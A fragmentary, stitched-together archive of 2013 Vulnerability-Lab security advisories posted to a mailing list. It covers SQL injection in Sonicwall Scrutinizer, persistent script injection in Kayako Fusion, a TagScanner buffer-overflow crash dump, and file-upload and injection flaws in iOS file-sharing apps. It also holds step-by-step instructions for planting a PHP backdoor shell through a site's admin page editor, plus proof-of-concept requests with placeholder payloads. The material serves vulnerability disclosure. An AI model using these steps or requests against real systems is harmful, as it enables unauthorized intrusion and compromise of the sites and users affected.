profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad

0day full - Free Monthly Websites v2.0 - Multiple Web Vulnerabilities

2013-02-04 Thread Vulnerability Lab

 Navigation Page.
Picture: http://i45.tinypic.com/vigzsp.png

3rd. Still at the same page, scroll down the page until you see this section : 
Sort Your Page Buttons/Links.
Pic : http://i46.tinypic.com/1040oxg.png
Change FROM dwi.php.html TO /dwi.php then Click Sort Navigation Pages.
Picture: http://i49.tinypic.com/24ec1l0.jpg

4th. Go to Edit Navigation Page.
http://www.massmoneywebsites.com/admin/edit_main_pages.php
Please Select a Page To Edit: dwi.php.html --- Select that page.

5th. Inspect element on dwi.php.html
Pic : http://i50.tinypic.com/29pq1ix.png
Change FROM option value=dwi.php.html selected=dwi.php.html/option
To option value=dwi.php selected=dwi.php/option
Picture: http://i47.tinypic.com/wtb0j6.png

6th. Enter A Page Title As You Would Like It To Be Seen. Fill with dwi.php
URL For This Page: main_pages/dwi.php 
Use the 'URL For This Page' field above: [Tick] 
Display This Page in Left Vertical Site Navigation: [Tick]
Display This Page in Top Horizontal Site Navigation Buttons: [Tick]
Picture: http://i46.tinypic.com/1zebnle.png

7th. Still at the same page, scroll down the page until you see this section : 
Enter Content For Your Page:
Click SOURCE button 
Press Enter Twice at the First Line then Paste your PHP Backdoor/PHP Shell 
below.
And Press Enter Twice at the Last Line.
*Please see 2 Pictures below If you dunno Understand :p
Picture 1 : http://i49.tinypic.com/1zlzxq0.png
Picture 2 : http://i48.tinypic.com/291kc9h.png

If you wanna do this, please remove your backdoor password.
Click Save edited navigation page.

8th. After this message  Data saved successfully  Appeared, Visit the Home 
Page and you will see the Backdoor Page
Picture : http://i49.tinypic.com/4rt1g4.png


Risk:
=
The security risk of the unauthorized file upload vulnerability via auth bypass 
is estimated as critical.


Credits:

X-Cisadane - (stefanus...@ymail.com)
Greetz 2: X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, 
Jakarta Anonymous Club and Ngobas


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability

2013-02-14 Thread Vulnerability Lab

Title:
==
Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability


Date:
=
2013-02-13


References:
===
http://www.vulnerability-lab.com/get_content.php?id=789

#9984: Investigate Vulnerability Lab issues (this ticket included tracking the 
creation of our DBI shim to error on semi-colon)
#10149: Create a common function to escape characters that can be used for SQL 
injection
#10139: Review all mapping and flow analytics queries to make sure inputs 
included in SQL are escaped
#10141: Review all reporting and filtering queries to make sure inputs included 
in SQL are escaped
#10140: Review all alarm tab and admin tab queries to make sure inputs included 
in SQL are escaped


VL-ID:
=
789


Common Vulnerability Scoring System:

7.3


Introduction:
=
Dell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic 
analytics, visualization and reporting tool 
to measure and troubleshoot network performance and utilization while 
increasing productivity for enterprises and service providers. 
Scrutinizer supports a wide range of routers, switches, firewalls, and 
data-flow reporting protocols, providing unparalleled insight 
into application traffic analysis from IPFIX/NetFlow data exported by Dell 
SonicWALL firewalls, as well as support for a wide range 
of routers, switches, firewalls, and data-flow reporting protocols. IT 
administrators in charge of high throughput networks can 
deploy Scrutinizer as a virtual appliance for high performance environments. 

(Copy of the Vendor Homepage: 
http://www.sonicwall.com/us/en/products/Scrutinizer.html )



Abstract:
=
The Vulnerability Laboratory Research Team discovered SQL Injection 
vulnerability in the Dells Sonicwall OEM Scrutinizer v9.5.2 appliance 
application.


Report-Timeline:

2012-12-05: Researcher Notification  Coordination
2012-12-07: Vendor Notification
2013-01-08: Vendor Response/Feedback
2013-02-10: Vendor Fix/Patch
2013-02-11: Public Disclosure


Status:

Published


Affected Products:
==
DELL
Product: Sonicwall OEM Scrutinizer 9.5.2


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A blind SQL Injection vulnerability is detected in the Sonicwall OEM 
Scrutinizer v9.5.2 appliance application.
The bug allows remote attackers to execute/inject own sql statement/commands to 
manipulate the affected vulnerable application dbms.
The sql injection vulnerability is located in the fa_web.cgi file with the 
bound gadget listing module and the vulnerable orderby or 
gadget parameters. Exploitation requires no user interaction  without 
privileged application user account. Successful exploitation of 
the remote sql vulnerability results in dbms  application compromise. 

Vulnerable File(s):
[+] fa_web.cgi

Vulnerable Module(s):
[+] gadget listing

Vulnerable Parameter(s):
[+] orderby
[+] gadget


Proof of Concept:
=
The remote sql injection vulnerability can be exploited by remote attackers 
without required privileged application user account 
and also without user interaction. For demonstration or reproduce ...

PoC:
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes-1%27[SQL 
INJECTION VULNERABILITY!]orderby=1cachebreaker=23_52_5_814-1%27
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytesorderby=-1%27[SQL
 INJECTION VULNERABILITY!]cachebreaker=23_52_5_814-1%27



Solution:
=
1) Scrutinizer team created a own DB layer that will die if a semicolon is 
found within a SQL query
2) We have changed more queries to pass inputs as bound variables to the DB 
engine which prevents possible SQL injection


Risk:
=
The security risk of the remote sql injection vulnerability is estimated as 
high(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln

Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability

2013-02-21 Thread Vulnerability Lab

Title:
==
Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability


Date:
=
2013-02-13


References:
===
http://www.vulnerability-lab.com/get_content.php?id=789

#9984: Investigate Vulnerability Lab issues (this ticket included tracking the 
creation of our DBI shim to error on semi-colon)
#10149: Create a common function to escape characters that can be used for SQL 
injection
#10139: Review all mapping and flow analytics queries to make sure inputs 
included in SQL are escaped
#10141: Review all reporting and filtering queries to make sure inputs included 
in SQL are escaped
#10140: Review all alarm tab and admin tab queries to make sure inputs included 
in SQL are escaped


VL-ID:
=
789


Common Vulnerability Scoring System:

7.3


Introduction:
=
Dell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic 
analytics, visualization and reporting tool 
to measure and troubleshoot network performance and utilization while 
increasing productivity for enterprises and service providers. 
Scrutinizer supports a wide range of routers, switches, firewalls, and 
data-flow reporting protocols, providing unparalleled insight 
into application traffic analysis from IPFIX/NetFlow data exported by Dell 
SonicWALL firewalls, as well as support for a wide range 
of routers, switches, firewalls, and data-flow reporting protocols. IT 
administrators in charge of high throughput networks can 
deploy Scrutinizer as a virtual appliance for high performance environments. 

(Copy of the Vendor Homepage: 
http://www.sonicwall.com/us/en/products/Scrutinizer.html )



Abstract:
=
The Vulnerability Laboratory Research Team discovered SQL Injection 
vulnerability in the Dells Sonicwall OEM Scrutinizer v9.5.2 appliance 
application.


Report-Timeline:

2012-12-05: Researcher Notification  Coordination
2012-12-07: Vendor Notification
2013-01-08: Vendor Response/Feedback
2013-02-10: Vendor Fix/Patch
2013-02-11: Public Disclosure


Status:

Published


Affected Products:
==
DELL
Product: Sonicwall OEM Scrutinizer 9.5.2


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A blind SQL Injection vulnerability is detected in the Sonicwall OEM 
Scrutinizer v9.5.2 appliance application.
The bug allows remote attackers to execute/inject own sql statement/commands to 
manipulate the affected vulnerable application dbms.
The sql injection vulnerability is located in the fa_web.cgi file with the 
bound gadget listing module and the vulnerable orderby or 
gadget parameters. Exploitation requires no user interaction  without 
privileged application user account. Successful exploitation of 
the remote sql vulnerability results in dbms  application compromise. 

Vulnerable File(s):
[+] fa_web.cgi

Vulnerable Module(s):
[+] gadget listing

Vulnerable Parameter(s):
[+] orderby
[+] gadget


Proof of Concept:
=
The remote sql injection vulnerability can be exploited by remote attackers 
without required privileged application user account 
and also without user interaction. For demonstration or reproduce ...

PoC:
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes-1%27[SQL 
INJECTION VULNERABILITY!]orderby=1cachebreaker=23_52_5_814-1%27
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytesorderby=-1%27[SQL
 INJECTION VULNERABILITY!]cachebreaker=23_52_5_814-1%27



Solution:
=
1) Scrutinizer team created a own DB layer that will die if a semicolon is 
found within a SQL query
2) We have changed more queries to pass inputs as bound variables to the DB 
engine which prevents possible SQL injection


Risk:
=
The security risk of the remote sql injection vulnerability is estimated as 
high(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln

MyFi Wireless Disk 1.2 iPad iPhone - Multiple Vulnerabilities

2013-02-21 Thread Vulnerability Lab

Title:
==
MyFi Wireless Disk 1.2 iPad iPhone - Multiple Vulnerabilities


Date:
=
2013-02-13


References:
===
http://www.vulnerability-lab.com/get_content.php?id=864


VL-ID:
=
864


Status:

Published


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability 
Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Kayako Fusion v4.51.1891 - Multiple Web Vulnerabilities

2013-02-25 Thread Vulnerability Lab

[PERSISTENT INJECTED SCRIPT CODE!]%20%20%20%20[PERSISTENT INJECTED SCRIPT 
CODE!]) /div/div/div
div id=gridcontentcustomfieldgroupgridform 
name=form_customfieldgroupgrid id=form_customfieldgroupgrid 
action=http://rem0ve.137.0.0.1:8080/admin/Base/CustomFieldGroup/Manage//; 
method=post onsubmit=javascript: return false;
input autocomplete=OFF name=csrfhash 
value=z2hvplh1kar0dm8rzvwmln0ilddeunsc type=hiddendiv id=widthwrapper 
style=width: 100%;
div id=gridtoolbardiv class=gridtoolbarnew id=gridextendedtoolbardiv 
class=gridtoolbarsub
ullia 
href=http://rem0ve.137.0.0.1:8080/admin/Base/CustomFieldGroup/Insert; 
viewport=1img src=Manage-Dateien/icon_addplus.gif 
align=absmiddle border=0 New/a/li/ul/div/div

Reference(s):
http://rem0ve.137.0.0.1:8080/admin/Base/CustomFieldGroup/Manage



Review: Live-Chat - Visitor Group Title


div id= class=dialogcontainerdiv class=dialogok/divdiv 
class=dialogokcontainerdiv class=dialogtitle
Inserted Visitor Group [PERSISTENT INJECTED SCRIPT 
CODE!]%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]) /div

... or

div class=ui-dialog-titlebar ui-widget-header ui-corner-all 
ui-helper-clearfixspan id=ui-dialog-title-window_editgroup 
class=ui-dialog-titleimg 
src=http://rem0ve.137.0.0.1:8080/__swift/themes/__cp/images/icon_window.gif; 
align=absmiddle 
border=0 Edit Visitor Group: [PERSISTENT INJECTED SCRIPT 
CODE!]%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]) 
[PERSISTENT INJECTED SCRIPT CODE!]/span

Reference(s):
http://rem0ve.137.0.0.1:8080/admin/LiveChat/Group/Manage


Risk:
=
The security risk of the persistent input validation web vulnerabilities are 
estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability 
Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

TagScanner v5.1 - Stack Buffer Overflow Vulnerability

2013-03-13 Thread Vulnerability Lab

=00410041 edx=779cb46d esi= edi=
eip=41414141 esp=0018ea90 ebp=0018eab0 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010246
Tagscan+0x10041:
41414141 add byte ptr [eax],al  ds:002b:=??
0:000 !exchain
0018eaa4: ntdll!LdrRemoveLoadAsDataTable+d64 (779cb46d)
0018eed0: Tagscan+14420 (00414420)
0018eef0: Tagscan+1ead78 (005ead78)
0018f154: Tagscan+10041 (41414141)
Invalid exception stack at 41414141
0:000 u
Tagscan+0x10041:
41414141 add byte ptr [eax],al
00410043 00ac004100  add byte ptr [eax+eax+41h],ch
0041004a add byte ptr [eax],al
0041004c add byte ptr [eax],al
0041004e add byte ptr [eax],al
00410050 add byte ptr [eax],al
00410052 add byte ptr [eax],al
00410054 94  xchgeax,esp
0:000 a
41414141

--- APPCrash Logs ---
EventType=APPCRASH (BEX)
EventTime=130029411726060019
ReportType=2
Consent=1
ReportIdentifier=ddec5c9b-6102-11e2-adfe-efaefe8363dd
IntegratorReportIdentifier=ddec5c9a-6102-11e2-adfe-efaefe8363dd
WOW64=1
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=Tagscan.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=5.1.6.30
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=50f57b7e
Sig[3].Name=Fehlermodulname
Sig[3].Value=Tagscan.exe
Sig[4].Name=Fehlermodulversion
Sig[4].Value=5.1.6.30
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=50f57b7e
Sig[6].Name=Ausnahmecode
Sig[6].Value=c005
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=41414141
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.1.7601.2.1.0.768.3
DynamicSig[2].Name=Gebietsschema-ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Zusatzinformation 1
DynamicSig[22].Value=c9ed
DynamicSig[23].Name=Zusatzinformation 2
DynamicSig[23].Value=c9ed9ec450d4be6144400a9541f5eddb
DynamicSig[24].Name=Zusatzinformation 3
DynamicSig[24].Value=04ae
DynamicSig[25].Name=Zusatzinformation 4
DynamicSig[25].Value=04ae339f4a83b6a3d3bf04a428f6874f
UI[2]=C:\Program Files (x86)\TagScanner\Tagscan.exe
UI[3]=Ultimate TagScanner funktioniert nicht mehr
UI[4]=Windows kann online nach einer Lösung für das Problem suchen.
UI[5]=Online nach einer Lösung suchen und das Programm schließen
UI[6]=Später online nach einer Lösung suchen und das Programm schließen
UI[7]=Programm schließen
LoadedModule[0]=C:\Program Files (x86)\TagScanner\Tagscan.exe
LoadedModule[62]=C:\Program Files (x86)\TagScanner\plugins\bass_aac.dll
LoadedModule[63]=C:\Program Files (x86)\TagScanner\plugins\bass_alac.dll
LoadedModule[64]=C:\Program Files (x86)\TagScanner\plugins\bass_ape.dll
LoadedModule[65]=C:\Program Files (x86)\TagScanner\plugins\bass_mpc.dll
LoadedModule[66]=C:\Program Files (x86)\TagScanner\plugins\bass_ofr.dll
LoadedModule[67]=C:\Program Files (x86)\TagScanner\OptimFROG.dll
LoadedModule[68]=C:\Program Files (x86)\TagScanner\plugins\bass_spx.dll
LoadedModule[69]=C:\Program Files (x86)\TagScanner\plugins\bass_tta.dll
LoadedModule[70]=C:\Program Files (x86)\TagScanner\plugins\bass_wv.dll
LoadedModule[71]=C:\Program Files (x86)\TagScanner\plugins\bassflac.dll
LoadedModule[72]=C:\Program Files (x86)\TagScanner\plugins\basswma.dll
LoadedModule[73]=C:\Program Files (x86)\TagScanner\plugins\bassopus.dll
LoadedModule[74]=C:\Windows\system32\mswsock.dll
LoadedModule[75]=C:\Windows\System32\wshtcpip.dll
LoadedModule[76]=C:\Windows\system32\DNSAPI.dll
LoadedModule[77]=C:\Program Files (x86)\Bonjour\mdnsNSP.dll
LoadedModule[78]=C:\Windows\system32\Iphlpapi.DLL
LoadedModule[79]=C:\Windows\system32\WINNSI.DLL
LoadedModule[80]=C:\Windows\system32\rasadhlp.dll
LoadedModule[81]=C:\Windows\System32\wship6.dll
LoadedModule[82]=C:\Windows\system32\avrt.dll
FriendlyEventName=Nicht mehr funktionsfähig
ConsentKey=APPCRASH
AppName=Ultimate TagScanner
AppPath=C:\Program Files (x86)\TagScanner\Tagscan.exe


Solution:
=
The vulnerability can be patched by a restriction of the input fields when 
processing to load the rename folder by tag listing.



Risk:
=
The security risk of the local buffer overflow vulnerability is estimated as 
high(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do

MailOrderWorks v5.907 - Multiple Web Vulnerabilities

2013-04-01 Thread Vulnerability Lab

:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]



Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability 
Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Wireless Disk PRO v2.3 iOS - Multiple Web Vulnerabilities

2013-05-13 Thread Vulnerability Lab

) to implement/inject malicious script code 
on the application side (persistent) of the app web service. 

The vulnerability is located in the index file dir listing module of the 
webserver (http://localhost:6566/) when processing to display
injected and via POST request method manipulated filenames. The persistent 
script code will be executed out of the main index file dir 
listing module when the service is processing to list the new malicious 
injected filename as item.

Exploitation of the persistent web vulnerability requires low or medium user 
interaction without application user account.
Successful exploitation of the vulnerability can lead to persistent session 
hijacking (customers), account steal via persistent web 
attacks, persistent phishing or stable (persistent) certificate mail 
notification context manipulation.

Vulnerable Application(s):
[+] Wireless Disk PRO v2.3 - ITunes or AppStore 
(Apple)

Vulnerable Module(s):
[+] File Upload  (Web Server) [Remote]

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] Filename - Index File Dir Listing


Proof of Concept:
=
1.1
The file include web vulnerability can be exploited by remote attackers without 
application user account and also without user interaction. 
For demonstration or reproduce ...

PoC: (POST)
-243701706111075
Content-Disposition: form-data; name=file; filename=[FILE/PATH INCLUDE WEB 
VULNERABILITY].png
Content-Type: image/gif  flag: 137


1.2
The command injection web vulnerability can be exploited by local privilege 
device user accounts with low required user interaction.
For demonstration or reproduce ...

DEVICE NAME: IPad360 ¥337

Standard Application Header:
div id=header_bottomThe following files are the hosts live from IPad360 
¥337 WirelessDisk App Document folder/div

Manipulated Application Header:
div id=header_bottomThe following files are the hosts live from [COMMAND 
INJECTION VIA DEVICENAME!] WirelessDisk App Document folder/div


1.3
The persistent script code injection web vulnerability can be exploited by 
remote attackers without application user account 
and with medium required user interaction. For demonstration or reproduce ...

Review:  Index File Dir Listing - Name
table id=table1 border=0 cellpadding=1 cellspacing=2 
width=741tbodytrtd style=width:461px;background-color:#ebebeb;
 ?? a href=327.png target=_blank327.png/a/tdtd 
style=width:100px;background-color:#e3e3e3;text-align:right;
27.27 KB /tdtd 
style=width:180px;text-align:center;background-color:#ebebeb;2013-02-11 
08:07:16/td/trtr
td style=width:461px;background-color:#ebebeb; ?? 
a href=[PERSISTENT INJECTED SCRIPT CODE AS NAME!] 
target=_blank[PERSISTENT INJECTED SCRIPT CODE AS 
NAME!]%20%20%20%20/a/td
td style=width:100px;background-color:#e3e3e3;text-align:right;27.27 KB 
/tdtd style=width:180px;text-align:
center;background-color:#ebebeb;2013-02-11 08:07:35/td/tr


Risk:
=
1.1
The security risk of the local file/path include web vulnerability via POST 
request method is estimated as critical.

1.2
The security risk of the local command injection vulnerability is estimated as 
high(-).

1.3
The security risk of the persistent input validation web vulnerability is 
estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability

File Lite 3.3 3.5 PRO iOS - Multiple Web Vulnerabilities

2013-05-13 Thread Vulnerability Lab

 an application user account 
but low or medium user interaction.
Successful exploitation results in client side cross site requests, 
unauthorized external redirects, client side phishing, 
client side session hijacking and client side module context manipulation.

Vulnerable Application(s):
[+] File Lite 3.3  3.5 PRO - ITunes or 
AppStore (Apple)

Vulnerable Module(s):
[+] Files - GET Request

Vulnerable Parameter(s):
[+] filename


Proof of Concept:
=
1.1
the arbitrary file upload vulnerability can be exploited by remote attackers 
without required application user account or user interaction.
For demonstration or reproduce ...

PoC: POST REQUEST METHOD - FILE UPLOAD

Host=192.168.2.104:8080

User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 
Firefox/20.0

Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language=en-US,en;q=0.5

Accept-Encoding=gzip, deflate
DNT=1

Referer=http://192.168.2.104:8080/

Connection=keep-alive
Content-Type=multipart/form-data; 
boundary=---48201118910051
Content-Length=98447
POSTDATA =-48201118910051
Content-Disposition: form-data; name=newfile; 
filename=hacki-hack.png.txt.html.php.gif[FILE UPLOAD VULNERABILITY]
Content-Type: image/gif
?PNG ...



Review:
[{'name':'.Private', 'id':0},{'name':'1234.png.txt.iso.php.gif', 
